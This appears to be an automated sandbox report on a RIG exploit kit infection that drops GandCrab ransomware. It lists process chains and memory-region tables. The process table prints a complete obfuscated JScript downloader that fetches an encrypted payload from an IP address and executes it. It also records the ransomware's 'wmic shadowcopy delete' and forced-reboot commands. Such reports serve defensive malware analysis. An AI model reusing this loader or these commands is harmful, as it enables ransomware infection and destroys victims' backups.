RIG EK Drops GandCrab v3.0.1 | Sequential Behavior
VTI SCORE: 100/100
Target: win7_64_sp1 | ie
Classification: Dropper, Trojan, Downloader, Ransomware

http://youtubeconverter.slyip.net/WpLTQb?browser=ie&countryname=United+States

URL

Created at 2018-05-11 13:20:00

Notifications (2/4)

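Due to a reputation service error, no query could be made to determine the reputation status of any contacted URL; the absence of reputation results in this report therefore says nothing about whether those URLs are benign.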

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

Some memory dumps may be missing in the reports since the total dump size limit was reached during the analysis. You can increase the limit in the configuration settings.

Monitored Processes

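Process Overview
The Origin ID column links each entry to the monitored process it is attributed to. Followed from the analysis target, the chain is #1 iexplore.exe → #2 iexplore.exe → #3 cmd.exe → #4 wscript.exe → #5 cmd.exe → #6 b32.exe. Process #6 is the origin of the nslookup, wmic shadowcopy delete, shutdown and iexplore.exe -nohome entries (#10, #11, #12, #14, #15), which are listed at System (Elevated) integrity although #6 itself is listed at Medium.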
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x8e4 Analysis Target Medium iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" about:blank -
#2 0x938 Child Process Medium iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2276 CREDAT:14337 #1
#3 0xa6c Child Process Medium cmd.exe cmd.exe /q /c cd /d "%tmp%" && echo /**/function V(k){var y=a(e+"."+e+/**/"Reques\x74.5.1");T="G";y["se"+"tProxy"](n);y["o"+"pen"](T+"ET",k(1),1);y["Option"](n)=k(2);y.send();y["Wai"+"tForResponse"]();W="respo"+"nseText";if(40*5==y.status)return _(y[W],k(n))};function _(k,e){for(var l=0,n,c=[],F=255,S=String,q=[],b=0;256^>b;b++)c[b]=b;ta="charCodeAt";for(b=0;256^>b;b++)l=l+c[b]+e[ta](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q["join"]("")};try{M="WSc";u=this[M+"ript"],o="Object";P=(""+u).split(" ")[1],M="indexOf",m=u.Arguments,e="WinHTTP",Z="cmd",U="DEleTefIle",a=Function/**/("QW","return u.Create"+o+"(QW)"),q=a(P+"ing.FileSystem"+o),s=a("ADO"+"DB.Stream"),j=a("W"+P+".Shell"),x="b"+Math.floor(Math.random() * 57)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";try{v=V(m)}catch(W){v=V(m)};Q="PE\x00\x00";d=v.charCodeAt(21+v[M](Q));s.Open();h="dll";if(037^<d){var z=1;x+=h}else x+=p;s.WriteText(v);s.savetofile(x,2);C=" /c ";s.Close();i="regs";z^&^&(x=i+"vr32"+E+" /s "+x);j["run"](Z+E+C+x,0)}catch(EE){};q[U](K);>u32.tmp && start wscript //B //E:JScript u32.tmp "LZytas3d" "http://95.142.39.142/?MTAzNDE3&ofvcTlM&NOhFPrkEXYygcYr=c2Vh&XFZaDrsXTiVcOS=c2Vh&CQXjFXpCD=bWF0Y2h1cA==&uZwiNDOCVY=c3BvcnQ=&DGPafWFTVR=c2My&fdfsdf3gf=xXzQMvWebRXQCJ3EKvncT6NEMVHRHkCL2YqdmrHVefjaelWkzrfFTF_yozKATgSG6_dtdfJR&t4dsdfa4=DQbiiUHRfwQ1n49cBwsS9K6n20XUnUefh8SH-UCEYA5M-pOUFLcz2VX9yLMkc8Mm90vC62Jg&KMWDJCCKgTcdNl=cmVzb3J0&wAORzkZnO=cmVzb3J0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" #2
#4 0xa84 Child Process Medium wscript.exe wscript //B //E:JScript u32.tmp "LZytas3d" "http://95.142.39.142/?MTAzNDE3&ofvcTlM&NOhFPrkEXYygcYr=c2Vh&XFZaDrsXTiVcOS=c2Vh&CQXjFXpCD=bWF0Y2h1cA==&uZwiNDOCVY=c3BvcnQ=&DGPafWFTVR=c2My&fdfsdf3gf=xXzQMvWebRXQCJ3EKvncT6NEMVHRHkCL2YqdmrHVefjaelWkzrfFTF_yozKATgSG6_dtdfJR&t4dsdfa4=DQbiiUHRfwQ1n49cBwsS9K6n20XUnUefh8SH-UCEYA5M-pOUFLcz2VX9yLMkc8Mm90vC62Jg&KMWDJCCKgTcdNl=cmVzb3J0&wAORzkZnO=cmVzb3J0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" #3
#5 0xab8 Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c b32.exe #4
#6 0xad4 Child Process Medium b32.exe b32.exe #5
#10 0xb44 Child Process System (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #6
#11 0x770 Child Process System (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #6
#12 0x110 Child Process System (Elevated) wmic.exe "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete #6
#14 0x7fc Child Process System (Elevated) cmd.exe "C:\Windows\System32\cmd.exe" /c shutdown -r -t 60 -f #6
#15 0x7e8 Child Process System (Elevated) iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome #6
#16 0x978 Child Process System (Elevated) shutdown.exe shutdown -r -t 60 -f #14
#17 0x9a4 Child Process System (Elevated) ie4uinit.exe "C:\Windows\SysWOW64\ie4uinit.exe" -ShowQLIcon #15
#18 0xbcc Child Process System (Elevated) iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2024 CREDAT:14337 #15
#20 0x394 Child Process System (Elevated) ssvagent.exe "C:\PROGRA~2\Java\jre7\bin\ssvagent.exe" -new #18

Behavior Information - Sequential View

Process #1: iexplore.exe
0 0
Information Value
ID #1
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" about:blank
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:19, Reason: Analysis Target
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:02:05
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x8e4
Parent PID 0x564 (Unknown)
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 974
0x 930
0x 92C
0x 928
0x 924
0x 914
0x 910
0x 90C
0x 908
0x 904
0x 900
0x 8FC
0x 8F8
0x 8F4
0x 8F0
0x 8EC
0x 8E8
0x 9C8
0x 9CC
0x 9E4
0x 828
0x 398
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
private_0x00000000000d0000 0x000d0000 0x001cffff Private Memory Readable, Writable True False False -
iexplore.exe.mui 0x001d0000 0x001d1fff Memory Mapped File Readable, Writable False False False -
private_0x00000000001e0000 0x001e0000 0x001e0fff Private Memory Readable, Writable True False False -
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory Readable, Writable True False False -
private_0x0000000000200000 0x00200000 0x0020ffff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00250000 0x00250fff Memory Mapped File Readable False False False -
pagefile_0x0000000000260000 0x00260000 0x00261fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000270000 0x00270000 0x00271fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000280000 0x00280000 0x00281fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000290000 0x00290000 0x00290fff Pagefile Backed Memory Readable, Writable True False False -
index.dat 0x002a0000 0x002affff Memory Mapped File Readable, Writable True False False -
index.dat 0x002b0000 0x002b7fff Memory Mapped File Readable, Writable True False False -
index.dat 0x002c0000 0x002cffff Memory Mapped File Readable, Writable True False False -
pagefile_0x00000000002d0000 0x002d0000 0x002d0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000002e0000 0x002e0000 0x002e0fff Pagefile Backed Memory Readable True False False -
private_0x00000000002f0000 0x002f0000 0x002f0fff Private Memory Readable, Writable True False False -
private_0x0000000000300000 0x00300000 0x00300fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000310000 0x00310000 0x00310fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000330000 0x00330000 0x00331fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000340000 0x00340000 0x003bffff Private Memory Readable, Writable True False False -
private_0x00000000003c0000 0x003c0000 0x003fffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0043ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000440000 0x00440000 0x004adfff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000004b0000 0x004b0000 0x005affff Private Memory Readable, Writable True False False -
pagefile_0x00000000005b0000 0x005b0000 0x00737fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000740000 0x00740000 0x008c0fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x008d0000 0x00b9efff Memory Mapped File Readable False False False -
private_0x0000000000ba0000 0x00ba0000 0x00c9ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000ca0000 0x00ca0000 0x00ca1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000cb0000 0x00cb0000 0x00cb1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000cc0000 0x00cc0000 0x00cc0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000cd0000 0x00cd0000 0x00d0ffff Private Memory Readable, Writable True False False -
private_0x0000000000d10000 0x00d10000 0x00d4ffff Private Memory Readable, Writable True False False -
private_0x0000000000d50000 0x00d50000 0x00d8ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000d90000 0x00d90000 0x00d91fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000da0000 0x00da0000 0x00da0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000db0000 0x00db0000 0x00dcffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000dd0000 0x00dd0000 0x00dd0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000de0000 0x00de0000 0x00de1fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000df0000 0x00df0000 0x00eeffff Private Memory Readable, Writable True False False -
private_0x0000000000ef0000 0x00ef0000 0x00feffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000ff0000 0x00ff0000 0x00ff0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000001000000 0x01000000 0x01000fff Private Memory Readable, Writable True False False -
private_0x0000000001010000 0x01010000 0x0110ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000001110000 0x01110000 0x01187fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000001190000 0x01190000 0x01192fff Private Memory Readable, Writable True False False -
private_0x00000000011a0000 0x011a0000 0x0129ffff Private Memory Readable, Writable True False False -
private_0x00000000012a0000 0x012a0000 0x012a2fff Private Memory Readable, Writable True False False -
private_0x00000000012b0000 0x012b0000 0x012b0fff Private Memory Readable, Writable True False False -
private_0x00000000012c0000 0x012c0000 0x012c2fff Private Memory Readable, Writable True False False -
private_0x00000000012d0000 0x012d0000 0x012d2fff Private Memory Readable, Writable True False False -
iexplore.exe 0x012e0000 0x01385fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000001390000 0x01390000 0x0278ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000002790000 0x02790000 0x027ecfff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000027f0000 0x027f0000 0x02801fff Private Memory Readable, Writable True False False -
private_0x0000000002810000 0x02810000 0x0284ffff Private Memory Readable, Writable True False False -
private_0x0000000002850000 0x02850000 0x02850fff Private Memory Readable, Writable True False False -
private_0x0000000002860000 0x02860000 0x02860fff Private Memory Readable, Writable True False False -
private_0x0000000002870000 0x02870000 0x0296ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002970000 0x02970000 0x02970fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002980000 0x02980000 0x02980fff Private Memory Readable, Writable True False False -
private_0x0000000002990000 0x02990000 0x02990fff Private Memory Readable, Writable True False False -
private_0x00000000029a0000 0x029a0000 0x029dffff Private Memory Readable, Writable True False False -
private_0x00000000029e0000 0x029e0000 0x029e3fff Private Memory Readable, Writable True False False -
private_0x00000000029f0000 0x029f0000 0x029f1fff Private Memory Readable, Writable True False False -
private_0x0000000002a00000 0x02a00000 0x02a3ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002a40000 0x02a40000 0x02b1efff Pagefile Backed Memory Readable True False False -
private_0x0000000002b20000 0x02b20000 0x02b20fff Private Memory Readable, Writable True False False -
private_0x0000000002b30000 0x02b30000 0x02b30fff Private Memory Readable, Writable True False False -
pagefile_0x0000000002b40000 0x02b40000 0x02b40fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002b50000 0x02b50000 0x02b8ffff Private Memory Readable, Writable True False False -
private_0x0000000002b90000 0x02b90000 0x02b9dfff Private Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db 0x02ba0000 0x02bbefff Memory Mapped File Readable True False False -
private_0x0000000002bc0000 0x02bc0000 0x02bc0fff Private Memory Readable, Writable True False False -
private_0x0000000002bd0000 0x02bd0000 0x02ccffff Private Memory Readable, Writable True False False -
private_0x0000000002cd0000 0x02cd0000 0x02cd0fff Private Memory Readable, Writable True False False -
private_0x0000000002ce0000 0x02ce0000 0x02ce0fff Private Memory Readable, Writable True False False -
private_0x0000000002cf0000 0x02cf0000 0x02d2ffff Private Memory Readable, Writable True False False -
private_0x0000000002d30000 0x02d30000 0x02d30fff Private Memory Readable, Writable True False False -
private_0x0000000002d40000 0x02d40000 0x02d40fff Private Memory Readable, Writable True False False -
private_0x0000000002d50000 0x02d50000 0x02d50fff Private Memory Readable, Writable True False False -
private_0x0000000002d60000 0x02d60000 0x02d60fff Private Memory Readable, Writable True False False -
private_0x0000000002d70000 0x02d70000 0x02e6ffff Private Memory Readable, Writable True False False -
private_0x0000000002e70000 0x02e70000 0x02eeffff Private Memory Readable, Writable True False False -
private_0x0000000002ef0000 0x02ef0000 0x02feffff Private Memory Readable, Writable True False False -
private_0x0000000002ff0000 0x02ff0000 0x02ff0fff Private Memory Readable, Writable True False False -
private_0x0000000003000000 0x03000000 0x03000fff Private Memory Readable, Writable True False False -
private_0x0000000003010000 0x03010000 0x03010fff Private Memory Readable, Writable True False False -
private_0x0000000003020000 0x03020000 0x03020fff Private Memory Readable, Writable True False False -
private_0x0000000003030000 0x03030000 0x0306ffff Private Memory Readable, Writable True False False -
private_0x0000000003070000 0x03070000 0x030affff Private Memory Readable, Writable True False False -
private_0x00000000030b0000 0x030b0000 0x030b0fff Private Memory Readable, Writable True False False -
private_0x00000000030c0000 0x030c0000 0x030c0fff Private Memory Readable, Writable True False False -
private_0x00000000030d0000 0x030d0000 0x031cffff Private Memory Readable, Writable True False False -
private_0x00000000031d0000 0x031d0000 0x031d0fff Private Memory Readable, Writable True False False -
private_0x00000000031e0000 0x031e0000 0x031e0fff Private Memory Readable, Writable True False False -
private_0x00000000031f0000 0x031f0000 0x031f0fff Private Memory Readable, Writable True False False -
private_0x0000000003200000 0x03200000 0x0323ffff Private Memory Readable, Writable True False False -
private_0x0000000003240000 0x03240000 0x03240fff Private Memory Readable, Writable True False False -
private_0x0000000003250000 0x03250000 0x03250fff Private Memory Readable, Writable True False False -
private_0x0000000003260000 0x03260000 0x03260fff Private Memory Readable, Writable True False False -
private_0x0000000003270000 0x03270000 0x032affff Private Memory Readable, Writable True False False -
private_0x00000000032b0000 0x032b0000 0x032bffff Private Memory Readable, Writable True False False -
private_0x00000000032c0000 0x032c0000 0x032c0fff Private Memory Readable, Writable True False False -
private_0x00000000032d0000 0x032d0000 0x032d0fff Private Memory Readable, Writable True False False -
private_0x00000000032e0000 0x032e0000 0x032e0fff Private Memory Readable, Writable True False False -
private_0x00000000032f0000 0x032f0000 0x032f0fff Private Memory Readable, Writable True False False -
private_0x0000000003300000 0x03300000 0x03300fff Private Memory Readable, Writable True False False -
private_0x0000000003310000 0x03310000 0x03310fff Private Memory Readable, Writable True False False -
private_0x0000000003320000 0x03320000 0x03320fff Private Memory Readable, Writable True False False -
private_0x0000000003330000 0x03330000 0x03330fff Private Memory Readable, Writable True False False -
private_0x0000000003340000 0x03340000 0x0334ffff Private Memory Readable, Writable True False False -
private_0x0000000003350000 0x03350000 0x0338ffff Private Memory Readable, Writable True False False -
private_0x0000000003390000 0x03390000 0x03390fff Private Memory Readable, Writable True False False -
private_0x00000000033a0000 0x033a0000 0x033a0fff Private Memory Readable, Writable True False False -
private_0x00000000033b0000 0x033b0000 0x033b0fff Private Memory Readable, Writable True False False -
private_0x00000000033c0000 0x033c0000 0x033fffff Private Memory Readable, Writable True False False -
private_0x0000000003400000 0x03400000 0x03400fff Private Memory Readable, Writable True False False -
private_0x0000000003410000 0x03410000 0x03410fff Private Memory Readable, Writable True False False -
private_0x0000000003420000 0x03420000 0x03420fff Private Memory Readable, Writable True False False -
private_0x0000000003430000 0x03430000 0x03430fff Private Memory Readable, Writable True False False -
private_0x0000000003440000 0x03440000 0x03442fff Private Memory Readable, Writable True False False -
private_0x0000000003450000 0x03450000 0x03450fff Private Memory Readable, Writable True False False -
pagefile_0x0000000003460000 0x03460000 0x03461fff Pagefile Backed Memory Readable True False False -
private_0x0000000003470000 0x03470000 0x0348ffff Private Memory Readable, Writable True False False -
msctf.dll.mui 0x03490000 0x03490fff Memory Mapped File Readable, Writable False False False -
pagefile_0x00000000034a0000 0x034a0000 0x034a0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000034b0000 0x034b0000 0x035affff Private Memory Readable, Writable True False False -
pagefile_0x00000000035b0000 0x035b0000 0x035b0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000035c0000 0x035c0000 0x035cdfff Private Memory Readable, Writable True False False -
private_0x00000000035d0000 0x035d0000 0x035d0fff Private Memory Readable, Writable True False False -
private_0x00000000035e0000 0x035e0000 0x036dffff Private Memory Readable, Writable True False False -
private_0x00000000036e0000 0x036e0000 0x037dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000037e0000 0x037e0000 0x03bd2fff Pagefile Backed Memory Readable True False False -
private_0x0000000003be0000 0x03be0000 0x03be0fff Private Memory Readable, Writable True False False -
private_0x0000000003bf0000 0x03bf0000 0x03bf0fff Private Memory Readable, Writable True False False -
private_0x0000000003c00000 0x03c00000 0x03c00fff Private Memory Readable, Writable True False False -
private_0x0000000003c10000 0x03c10000 0x03c15fff Private Memory Readable, Writable True False False -
private_0x0000000003c20000 0x03c20000 0x03c5ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000003c60000 0x03c60000 0x03ce5fff Pagefile Backed Memory Readable, Writable True False False -
cversions.2.db 0x03cf0000 0x03cf3fff Memory Mapped File Readable True False False -
private_0x0000000003d00000 0x03d00000 0x03d00fff Private Memory Readable, Writable True False False -
For performance reasons, the remaining 203 entries are omitted.
The remaining entries can be found in flog.txt.
Process #2: iexplore.exe
53 6
Information Value
ID #2
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2276 CREDAT:14337
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:19, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:02:05
OS Process Information
Information Value
PID 0x938
Parent PID 0x8e4 (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 970
0x 96C
0x 968
0x 964
0x 960
0x 95C
0x 958
0x 954
0x 950
0x 94C
0x 948
0x 944
0x 940
0x 93C
0x 980
0x 984
0x 98C
0x 990
0x 994
0x 9BC
0x 9D0
0x 9D4
0x 9D8
0x 0
0x 9DC
0x 9E0
0x AAC
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
iexplore.exe.mui 0x000d0000 0x000d1fff Memory Mapped File Readable, Writable False False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00100000 0x00100fff Memory Mapped File Readable False False False -
pagefile_0x0000000000110000 0x00110000 0x00111fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory Readable True False False -
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x003f7fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000400000 0x00400000 0x00401fff Pagefile Backed Memory Readable True False False -
private_0x0000000000410000 0x00410000 0x00410fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000420000 0x00420000 0x00420fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000430000 0x00430000 0x0043ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000440000 0x00440000 0x00441fff Pagefile Backed Memory Readable True False False -
private_0x0000000000450000 0x00450000 0x00450fff Private Memory Readable, Writable True False False -
private_0x0000000000460000 0x00460000 0x004dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000004e0000 0x004e0000 0x00660fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000670000 0x00670000 0x00671fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000680000 0x00680000 0x00681fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000690000 0x00690000 0x006cffff Private Memory Readable, Writable True False False -
private_0x00000000006d0000 0x006d0000 0x007cffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x007d0000 0x00a9efff Memory Mapped File Readable False False False -
pagefile_0x0000000000aa0000 0x00aa0000 0x00b7efff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000b80000 0x00b80000 0x00bedfff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000bf0000 0x00bf0000 0x00bf1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000c00000 0x00c00000 0x00c00fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000c10000 0x00c10000 0x00c10fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000c20000 0x00c20000 0x00c20fff Pagefile Backed Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db 0x00c30000 0x00c4efff Memory Mapped File Readable True False False -
pagefile_0x0000000000c50000 0x00c50000 0x00c50fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000c60000 0x00c60000 0x00c9ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000ca0000 0x00ca0000 0x00d17fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000d20000 0x00d20000 0x00d21fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000d30000 0x00d30000 0x00d6ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000d70000 0x00d70000 0x00d71fff Pagefile Backed Memory Readable True False False -
index.dat 0x00d80000 0x00d8ffff Memory Mapped File Readable, Writable True False False -
private_0x0000000000d90000 0x00d90000 0x00dcffff Private Memory Readable, Writable True False False -
index.dat 0x00dd0000 0x00dd7fff Memory Mapped File Readable, Writable True False False -
index.dat 0x00de0000 0x00deffff Memory Mapped File Readable, Writable True False False -
pagefile_0x0000000000df0000 0x00df0000 0x00df0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000e00000 0x00e00000 0x00e1ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000e20000 0x00e20000 0x00e20fff Pagefile Backed Memory Readable True False False -
private_0x0000000000e30000 0x00e30000 0x00e31fff Private Memory Readable, Writable True False False -
private_0x0000000000e40000 0x00e40000 0x00f3ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000f40000 0x00f40000 0x00f40fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000f50000 0x00f50000 0x00f52fff Pagefile Backed Memory Readable True False False -
private_0x0000000000f60000 0x00f60000 0x00f9ffff Private Memory Readable, Writable True False False -
private_0x0000000000fa0000 0x00fa0000 0x00fa3fff Private Memory Readable, Writable True False False -
private_0x0000000000fb0000 0x00fb0000 0x00fc7fff Private Memory Readable, Writable True False False -
private_0x0000000000fd0000 0x00fd0000 0x00fdffff Private Memory Readable, Writable True False False -
private_0x0000000000fe0000 0x00fe0000 0x010dffff Private Memory Readable, Writable True False False -
private_0x00000000010e0000 0x010e0000 0x010e0fff Private Memory Readable, Writable True False False -
private_0x00000000010f0000 0x010f0000 0x010fffff Private Memory - True False False -
private_0x0000000001100000 0x01100000 0x0110ffff Private Memory Readable, Writable True False False -
private_0x0000000001110000 0x01110000 0x0120ffff Private Memory Readable, Writable True False False -
private_0x0000000001210000 0x01210000 0x0121ffff Private Memory Readable, Writable True False False -
private_0x0000000001220000 0x01220000 0x0122ffff Private Memory Readable, Writable True False False -
private_0x0000000001230000 0x01230000 0x0123ffff Private Memory Readable, Writable True False False -
private_0x0000000001240000 0x01240000 0x0124ffff Private Memory Readable, Writable True False False -
private_0x0000000001250000 0x01250000 0x0128ffff Private Memory Readable, Writable True False False -
private_0x0000000001290000 0x01290000 0x0129ffff Private Memory Readable, Writable True False False -
private_0x00000000012a0000 0x012a0000 0x012affff Private Memory Readable, Writable True False False -
private_0x00000000012b0000 0x012b0000 0x012bffff Private Memory Readable, Writable True False False -
private_0x00000000012c0000 0x012c0000 0x012cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000012d0000 0x012d0000 0x012d0fff Pagefile Backed Memory Readable, Writable True False False -
iexplore.exe 0x012e0000 0x01385fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000001390000 0x01390000 0x0278ffff Pagefile Backed Memory Readable True False False -
private_0x0000000002790000 0x02790000 0x02790fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00000000027a0000 0x027a0000 0x027a0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000027b0000 0x027b0000 0x027bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000027c0000 0x027c0000 0x027c0fff Pagefile Backed Memory Readable True False False -
private_0x00000000027d0000 0x027d0000 0x0280ffff Private Memory Readable, Writable True False False -
private_0x0000000002810000 0x02810000 0x0290ffff Private Memory Readable, Writable True False False -
private_0x0000000002910000 0x02910000 0x02b0ffff Private Memory Readable, Writable True False False -
private_0x0000000002b10000 0x02b10000 0x02c0ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002c10000 0x02c10000 0x02c12fff Pagefile Backed Memory Readable True False False -
private_0x0000000002c20000 0x02c20000 0x02c23fff Private Memory Readable, Writable True False False -
private_0x0000000002c30000 0x02c30000 0x02c47fff Private Memory Readable, Writable True False False -
private_0x0000000002c50000 0x02c50000 0x02c5ffff Private Memory Readable, Writable True False False -
private_0x0000000002c60000 0x02c60000 0x02c9ffff Private Memory Readable, Writable True False False -
private_0x0000000002ca0000 0x02ca0000 0x02ca0fff Private Memory Readable, Writable True False False -
private_0x0000000002cb0000 0x02cb0000 0x02cbffff Private Memory - True False False -
private_0x0000000002cc0000 0x02cc0000 0x02ccffff Private Memory Readable, Writable True False False -
private_0x0000000002cd0000 0x02cd0000 0x02cdffff Private Memory Readable, Writable True False False -
private_0x0000000002ce0000 0x02ce0000 0x02ceffff Private Memory Readable, Writable True False False -
private_0x0000000002cf0000 0x02cf0000 0x02cfffff Private Memory Readable, Writable True False False -
private_0x0000000002d00000 0x02d00000 0x02d0ffff Private Memory Readable, Writable True False False -
private_0x0000000002d10000 0x02d10000 0x02e0ffff Private Memory Readable, Writable True False False -
